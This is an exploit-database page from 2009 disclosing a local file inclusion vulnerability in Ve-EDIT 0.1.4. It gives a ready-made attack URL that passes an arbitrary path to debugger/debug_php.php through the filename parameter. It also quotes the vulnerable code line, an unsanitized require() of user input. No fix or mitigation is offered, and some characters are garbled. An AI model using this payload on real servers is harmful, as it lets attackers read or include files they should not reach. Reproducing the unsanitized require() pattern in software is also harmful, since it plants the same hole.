[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ve-EDIT 0.1.4 (debug_php.php) Local File Inclusion Vulnerability
# Published : 2009-09-01
# Author : CoBRa_21
# Previous Title : phpBB3 addon prime_quick_style GetAdmin Vulnerability
# Next Title : Joomla Component com_gameserver 1.0 (id) SQL Injection Vulnerability


-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------
 
Author: CoBRa_21
 
Mail: uyku_cu[at]windowslive[dot]com
 
Script Download: http://sourceforge.net/projects/phpwebeditor/
 
-------------------------------------------------------------------------------------
 
EXPLO?°T:
 
http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LF?°]
 
-------------------------------------------------------------------------------------
 
BUG
Line 53:        require("./../".$_GET["filename"]); 
 
-------------------------------------------------------------------------------------

# www.Syue.com [2009-09-01]